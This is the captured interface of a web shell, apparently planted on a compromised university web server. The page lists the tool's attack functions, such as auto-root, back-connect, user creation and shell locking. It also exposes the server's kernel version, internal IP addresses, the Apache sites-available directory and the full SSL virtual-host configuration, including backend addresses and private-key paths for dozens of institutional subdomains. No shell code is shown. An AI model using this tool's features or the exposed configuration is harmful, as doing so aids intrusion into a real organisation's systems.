Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
apache2 /
sites-available /
[ HOME SHELL ]
Name
Size
Permission
Action
000-default.conf
1.3
KB
-rw-r--r--
001-urlab.conf
2.54
KB
-rw-r--r--
002-mooceu.conf
1.51
KB
-rw-r--r--
003-ycbootcamp.conf
1.39
KB
-rw-r--r--
004-cai.conf
1.37
KB
-rw-r--r--
005-itportal.conf
2.24
KB
-rw-r--r--
006-microbiome.conf
1.39
KB
-rw-r--r--
007-trueforecaster.conf
1.4
KB
-rw-r--r--
008-ethnographylab.conf
2.11
KB
-rw-r--r--
009-owc.conf
1.48
KB
-rw-r--r--
010-owasp.conf
1.38
KB
-rw-r--r--
011-intranet.conf
1.47
KB
-rw-r--r--
012-usg.conf
1.45
KB
-rw-r--r--
013-cyfuse.conf
1.46
KB
-rw-r--r--
014-neurocare-elab.conf
1.48
KB
-rw-r--r--
015-quantumseminar.conf
1.5
KB
-rw-r--r--
016-etidm.conf
1.55
KB
-rw-r--r--
017-aurora.conf
1.46
KB
-rw-r--r--
018-techtree.conf
1.74
KB
-rw-r--r--
019-beta-ihub.conf
1.95
KB
-rw-r--r--
020-byld.conf
1.91
KB
-rw-r--r--
021-test-ihub.conf
2.26
KB
-rw-r--r--
022-esummit.conf
2.25
KB
-rw-r--r--
023-events.conf
2.36
KB
-rw-r--r--
024-urbanlab.conf
2.33
KB
-rw-r--r--
025-cipd.conf
2.48
KB
-rw-r--r--
026-cilab.conf
2.47
KB
-rw-r--r--
027-induction.conf
2.49
KB
-rw-r--r--
028-quickstart24-le-ssl.conf
2.66
KB
-rw-r--r--
028-quickstart24.conf
2.6
KB
-rw-r--r--
029-vicas.conf
2.62
KB
-rw-r--r--
030-orco.conf
2.63
KB
-rw-r--r--
031-techtree.conf
2.58
KB
-rw-r--r--
032-flamelab.conf
1.89
KB
-rw-r--r--
033-temppayment.conf
1.77
KB
-rw-r--r--
034-psaidlab.conf
1.76
KB
-rw-r--r--
035-persisst.conf
1.76
KB
-rw-r--r--
036-academics.conf
1.77
KB
-rw-r--r--
037-builsec.conf
1.76
KB
-rw-r--r--
038-dss2025.conf
1.76
KB
-rw-r--r--
039-erp-iiitd-edu.conf
1.78
KB
-rw-r--r--
040-cryptolab.conf
1.77
KB
-rw-r--r--
041-greenpreneurs.conf
1.77
KB
-rw-r--r--
042-tcresm.dhanjal-lab.conf
1.78
KB
-rw-r--r--
043-vicas-dev.conf
2.66
KB
-rw-r--r--
044-cipdapplications.conf
2.68
KB
-rw-r--r--
045-meetwize.conf
2.67
KB
-rw-r--r--
046-nss.conf
2.66
KB
-rw-r--r--
047-conreg.conf
2.67
KB
-rw-r--r--
048-blog.conf
2.67
KB
-rw-r--r--
049-1pxdesignconf.conf
2.68
KB
-rw-r--r--
050-enveave-earth.conf
2.67
KB
-rw-r--r--
051-ihernblog.conf
2.68
KB
-rw-r--r--
052-coursewise.conf
2.68
KB
-rw-r--r--
053-bioautomyze.conf
2.85
KB
-rw-r--r--
054-cqt.conf
2.91
KB
-rw-r--r--
055-mathtemp.conf
2.67
KB
-rw-r--r--
default-ssl.conf
24.06
KB
-rw-r--r--
default-ssl.conf-org
6.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : default-ssl.conf
<IfModule mod_ssl.c> <VirtualHost _default_:443> ServerAdmin webmaster@localhost DocumentRoot /var/www/html # Available loglevels: trace8, ..., trace1, debug, info, notice, warn, # error, crit, alert, emerg. # It is also possible to configure the loglevel for particular # modules, e.g. #LogLevel info ssl:warn ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined # For most configuration files from conf-available/, which are # enabled or disabled at a global level, it is possible to # include a line for only one particular virtual host. For example the # following line enables the CGI configuration for this host only # after it has been globally disabled with "a2disconf". #Include conf-available/serve-cgi-bin.conf # SSL Engine Switch: # Enable/Disable SSL for this virtual host. SSLEngine on # A self-signed (snakeoil) certificate can be created by installing # the ssl-cert package. See # /usr/share/doc/apache2/README.Debian.gz for more info. # If both key and certificate are stored in the same file, only the # SSLCertificateFile directive is needed. SSLCertificateFile /etc/ssl/certs/ssl-cert-snakeoil.pem SSLCertificateKeyFile /etc/ssl/private/ssl-cert-snakeoil.key # Server Certificate Chain: # Point SSLCertificateChainFile at a file containing the # concatenation of PEM encoded CA certificates which form the # certificate chain for the server certificate. Alternatively # the referenced file can be the same as SSLCertificateFile # when the CA certificates are directly appended to the server # certificate for convinience. #SSLCertificateChainFile /etc/apache2/ssl.crt/server-ca.crt # Certificate Authority (CA): # Set the CA certificate verification path where to find CA # certificates for client authentication or alternatively one # huge file containing all of them (file must be PEM encoded) # Note: Inside SSLCACertificatePath you need hash symlinks # to point to the certificate files. Use the provided # Makefile to update the hash symlinks after changes. #SSLCACertificatePath /etc/ssl/certs/ #SSLCACertificateFile /etc/apache2/ssl.crt/ca-bundle.crt # Certificate Revocation Lists (CRL): # Set the CA revocation path where to find CA CRLs for client # authentication or alternatively one huge file containing all # of them (file must be PEM encoded) # Note: Inside SSLCARevocationPath you need hash symlinks # to point to the certificate files. Use the provided # Makefile to update the hash symlinks after changes. #SSLCARevocationPath /etc/apache2/ssl.crl/ #SSLCARevocationFile /etc/apache2/ssl.crl/ca-bundle.crl # Client Authentication (Type): # Client certificate verification type and depth. Types are # none, optional, require and optional_no_ca. Depth is a # number which specifies how deeply to verify the certificate # issuer chain before deciding the certificate is not valid. #SSLVerifyClient require #SSLVerifyDepth 10 # SSL Engine Options: # Set various options for the SSL engine. # o FakeBasicAuth: # Translate the client X.509 into a Basic Authorisation. This means that # the standard Auth/DBMAuth methods can be used for access control. The # user name is the `one line' version of the client's X.509 certificate. # Note that no password is obtained from the user. Every entry in the user # file needs this password: `xxj31ZMTZzkVA'. # o ExportCertData: # This exports two additional environment variables: SSL_CLIENT_CERT and # SSL_SERVER_CERT. These contain the PEM-encoded certificates of the # server (always existing) and the client (only existing when client # authentication is used). This can be used to import the certificates # into CGI scripts. # o StdEnvVars: # This exports the standard SSL/TLS related `SSL_*' environment variables. # Per default this exportation is switched off for performance reasons, # because the extraction step is an expensive operation and is usually # useless for serving static content. So one usually enables the # exportation for CGI and SSI requests only. # o OptRenegotiate: # This enables optimized SSL connection renegotiation handling when SSL # directives are used in per-directory context. #SSLOptions +FakeBasicAuth +ExportCertData +StrictRequire <FilesMatch "\.(cgi|shtml|phtml|php)$"> SSLOptions +StdEnvVars </FilesMatch> <Directory /usr/lib/cgi-bin> SSLOptions +StdEnvVars </Directory> # SSL Protocol Adjustments: # The safe and default but still SSL/TLS standard compliant shutdown # approach is that mod_ssl sends the close notify alert but doesn't wait for # the close notify alert from client. When you need a different shutdown # approach you can use one of the following variables: # o ssl-unclean-shutdown: # This forces an unclean shutdown when the connection is closed, i.e. no # SSL close notify alert is send or allowed to received. This violates # the SSL/TLS standard but is needed for some brain-dead browsers. Use # this when you receive I/O errors because of the standard approach where # mod_ssl sends the close notify alert. # o ssl-accurate-shutdown: # This forces an accurate shutdown when the connection is closed, i.e. a # SSL close notify alert is send and mod_ssl waits for the close notify # alert of the client. This is 100% SSL/TLS standard compliant, but in # practice often causes hanging connections with brain-dead browsers. Use # this only for browsers where you know that their SSL implementation # works correctly. # Notice: Most problems of broken clients are also related to the HTTP # keep-alive facility, so you usually additionally want to disable # keep-alive for those clients, too. Use variable "nokeepalive" for this. # Similarly, one has to force some clients to use HTTP/1.0 to workaround # their broken HTTP/1.1 implementation. Use variables "downgrade-1.0" and # "force-response-1.0" for this. # BrowserMatch "MSIE [2-6]" \ # nokeepalive ssl-unclean-shutdown \ # downgrade-1.0 force-response-1.0 </VirtualHost> </IfModule> # vim: syntax=apache ts=4 sw=4 sts=4 sr noet <VirtualHost *:443> ServerName cai.iiitd.ac.in DocumentRoot /var/www/html/cai SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.ac.in2022.crt SSLCertificateKeyFile /etc/ssl/tls/private/iiitd.ac.in2022.key SSLCACertificateFile /etc/ssl/tls/certs/ca_bundle2022 </VirtualHost> <VirtualHost *:443> ServerName ycbootcamp.iiitd.edu.in DocumentRoot /var/www/html/ycbootcamp SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName mooceu.iiitd.edu.in DocumentRoot /var/www/html/mooceu <Directory /var/www/html/mooceu/> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory> SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> Alias /static /var/www/html/IT-Portal/static <Directory /var/www/html/IT-Portal/static> Require all granted </Directory> Alias /templates /var/www/html/urlab/templates <Directory /var/www/html/urlab/templates> Require all granted </Directory> Alias /Hello /var/www/html/IT-Portal/Hello <Directory /var/www/html/IT-Portal/Hello/> Require all granted </Directory> Alias /home /var/www/html/IT-Portal/home <Directory /var/www/html/IT-Portal/home/> Require all granted </Directory> <Directory /var/www/html/IT-Portal/Hello> <Files wsgi.py> Require all granted </Files> </Directory> WSGIDaemonProcess sslitportal python-path=/var/www/html/IT-Portal WSGIProcessGroup sslitportal WSGIScriptAlias / /var/www/html/IT-Portal/Hello/wsgi.py ServerName it.iiitd.edu.in DocumentRoot /var/www/html/IT-Portal SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName microbiome.iiitd.edu.in DocumentRoot /var/www/html/microbiome SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName trueforecaster.iiitd.edu.in DocumentRoot /var/www/html/trueforecaster SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName ethnographylab.iiitd.edu.in DocumentRoot /var/www/html/ethnographylab SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName owc.iiitd.edu.in DocumentRoot /var/www/html/owc <Directory /var/www/html/owc/> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory> SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName owasp.iiitd.edu.in DocumentRoot /var/www/html/owasp SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName intranet.iiitd.edu.in DocumentRoot /var/www/html/intranetpage SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName usg.iiitd.edu.in DocumentRoot /var/www/html/usg SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName cyfuse.iiitd.edu.in DocumentRoot /var/www/html/cyfuse SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName neurocare-elab.iiitd.edu.in DocumentRoot /var/www/html/neurocare-elab SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName quantumseminar.iiitd.edu.in DocumentRoot /var/www/html/QuantumSeminar-main/build SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName etidm.iiitd.edu.in DocumentRoot /var/www/html/etidm SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName aurora.iiitd.edu.in DocumentRoot /var/www/html/aurora SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerAdmin webmaster@localhost ServerName techtree.iiitd.edu.in SSLEngine on # SSLCertificateFile /etc/apache2/ssl/yourdomain.crt # SSLCertificateKeyFile /etc/apache2/ssl/yourdomain.key SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt <Proxy *> Order deny,allow Allow from all </Proxy> ProxyPass / http://techtree.iiitd.edu.in/ ProxyPassReverse / http://techtree.iiitd.edu.in/ ErrorLog ${APACHE_LOG_DIR}/yourdomain_error.log CustomLog ${APACHE_LOG_DIR}/yourdomain_access.log combined # DocumentRoot /var/www/html/etidm # Redirect / https://aurora.iiitd.edu.in # Available loglevels: trace8, ..., trace1, debug, info, notice, warn, # error, crit, alert, emerg. # It is also possible to configure the loglevel for particular # modules, e.g. #LogLevel info ssl:warn ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined # For most configuration files from conf-available/, which are # enabled or disabled at a global level, it is possible to # include a line for only one particular virtual host. For example the # following line enables the CGI configuration for this host only # after it has been globally disabled with "a2disconf". #Include conf-available/serve-cgi-bin.conf </VirtualHost> <VirtualHost *:443> ServerName byld.iiitd.edu.in DocumentRoot /var/www/html/byld SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName urbanlab.iiitd.edu.in DocumentRoot /var/www/html/urbanlab SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName cipd.iiitd.ac.in DocumentRoot /var/www/html/cipd SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.ac.in2022.crt SSLCertificateKeyFile /etc/ssl/tls/private/iiitd.ac.in2022.key SSLCACertificateFile /etc/ssl/tls/certs/ca_bundle2022 #ProxyPass / http://localhost:5001/ #ProxyPassReverse / http://localhost:5001/ </VirtualHost> <VirtualHost *:443> ServerName cilab.iiitd.edu.in DocumentRoot /var/www/html/cilab SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName vicas.iiitd.edu.in DocumentRoot /var/www/html/vicas SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName induction.iiitd.edu.in DocumentRoot /var/www/html/induction SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName orco.iiitd.edu.in DocumentRoot /var/www/html/orco SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt #ProxyPass / http://192.168.3.70:6500/ #ProxyPassReverse / http://192.168.3.70:6500/ #<Proxy *> # Order deny,allow # Allow from all # </Proxy> # ProxyPass / http://orco.iiitd.edu.in/ # ProxyPassReverse / http://orco.iiitd.edu.in/ # ErrorLog ${APACHE_LOG_DIR}/yourdomain_error.log # CustomLog ${APACHE_LOG_DIR}/yourdomain_access.log combined </VirtualHost> <VirtualHost *:443> ServerName events.iiitd.edu.in DocumentRoot /var/www/html/events SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt <Proxy *> Order deny,allow Allow from all </Proxy> ProxyPass / http://localhost:5000/ ProxyPassReverse / http://localhost:5000/ ErrorLog ${APACHE_LOG_DIR}/yourdomain_error.log CustomLog ${APACHE_LOG_DIR}/yourdomain_access.log combined </VirtualHost> <VirtualHost *:443> ServerName flamelab.iiitd.edu.in DocumentRoot /var/www/html/flamelab SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName temppayment.iiitd.edu.in DocumentRoot /var/www/html/temppayment SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName psaidlab.iiitd.edu.in DocumentRoot /var/www/html/psaidlab SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName academics.iiitd.ac.in DocumentRoot /var/www/html/academics SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.ac.in2022.crt SSLCertificateKeyFile /etc/ssl/tls/private/iiitd.ac.in2022.key SSLCACertificateFile /etc/ssl/tls/certs/ca_bundle2022 </VirtualHost> <VirtualHost *:443> ServerName persisst.iiitd.edu.in DocumentRoot /var/www/html/persisst SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName buildsec.org DocumentRoot /var/www/html/buildsec25 SSLEngine on SSLCertificateFile /etc/letsencrypt/live/buildsec.org/fullchain.pem SSLCertificateKeyFile /etc/letsencrypt/live/buildsec.org/privkey.pem #SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName urlab.iiitd.edu.in DocumentRoot /var/www/html/urlab SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName esummit.iiitd.edu.in DocumentRoot /var/www/html/esummit SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName flamelab.iiitd.edu.in DocumentRoot /var/www/html/flamelab SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName dss2025.iiitd.edu.in DocumentRoot /var/www/html/dss2025 SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName erp.iiitd.edu.in DocumentRoot /var/www/html/erp-iiitd-edu SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt Redirect / https://iiitd.nurecampus.com/dashboard-login </VirtualHost> <VirtualHost *:443> ServerName cryptolab.iiitd.edu.in DocumentRoot /var/www/html/cryptolab SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName cipdapplications.iiitd.edu.in DocumentRoot /var/www/html/cipdapplication SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName meetwize.iiitd.edu.in DocumentRoot /var/www/html/meetwize SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt <Proxy *> Order deny,allow Allow from all </Proxy> ProxyPass / http://meetwize.iiitd.edu.in:8001/ ProxyPassReverse / http://meetwize.iiitd.edu.in:8001/ ErrorLog ${APACHE_LOG_DIR}/yourdomain_error.log CustomLog ${APACHE_LOG_DIR}/yourdomain_access.log combined </VirtualHost> <VirtualHost *:443> ServerName nss.iiitd.edu.in DocumentRoot /var/www/html/nss SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName vicas-dev.iiitd.edu.in DocumentRoot /var/www/html/vicas-dev SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt <Proxy *> Order deny,allow Allow from all </Proxy> ProxyPass / http://vicas-dev.iiitd.edu.in:8000/ ProxyPassReverse / http://vicas-dev.iiitd.edu.in:8000/ ErrorLog ${APACHE_LOG_DIR}/yourdomain_error.log CustomLog ${APACHE_LOG_DIR}/yourdomain_access.log combined </VirtualHost> <VirtualHost *:443> ServerName conreg.iiitd.edu.in DocumentRoot /var/www/html/conreg SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName 1pxdesignconf.iiitd.edu.in DocumentRoot /var/www/html/1pxdesignconf SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName ihernblog.iiitd.ac.in DocumentRoot /var/www/html/ihernblog SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.ac.in2022.crt SSLCertificateKeyFile /etc/ssl/tls/private/iiitd.ac.in2022.key SSLCACertificateFile /etc/ssl/tls/certs/ca_bundle2022 </VirtualHost> <VirtualHost *:443> ServerName coursewise.iiitd.edu.in DocumentRoot /var/www/html/coursewise SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost> <VirtualHost *:443> ServerName bioautomyze.iiitd.edu.in DocumentRoot /var/www/html/bioautomyze SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt ProxyPreserveHost On ProxyPass /api/ http://192.168.3.91:8000/ ProxyPassReverse /api/ http://192.168.3.91:8000/ </VirtualHost> <VirtualHost *:443> ServerName cqt.iiitd.ac.in DocumentRoot /var/www/html/cqt/dist # SSL Configuration SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.ac.in2022.crt SSLCertificateKeyFile /etc/ssl/tls/private/iiitd.ac.in2022.key SSLCACertificateFile /etc/ssl/tls/certs/ca_bundle2022 # Proxy Settings ProxyPreserveHost On ProxyRequests Off # API Proxy: /api/* → http://127.0.0.1:5000/* ProxyPass /api http://127.0.0.1:5000 ProxyPassReverse /api http://127.0.0.1:5000 # Directory Configuration - MUST include rewrite rules inside <Directory "/var/www/html/cqt/dist"> Require all granted # Enable RewriteEngine RewriteEngine On RewriteBase / # Don't rewrite files or directories that exist RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d # Don't rewrite API requests RewriteCond %{REQUEST_URI} !^/api # SPA Fallback: serve index.html for all other routes RewriteRule ^ /index.html [L] </Directory> # Logging ErrorLog ${APACHE_LOG_DIR}/cqt-error.log CustomLog ${APACHE_LOG_DIR}/cqt-access.log combined </VirtualHost> <VirtualHost *:443> ServerName mathnew.iiitd.edu.in DocumentRoot /var/www/html/mathtemp SSLEngine on SSLCertificateFile /etc/ssl/tls/certs/iiitd.edu.in.crt SSLCertificateKeyFile /etc/ssl/tls/private/server.key SSLCACertificateFile /etc/ssl/tls/certs/ca-bundle.crt </VirtualHost>
Close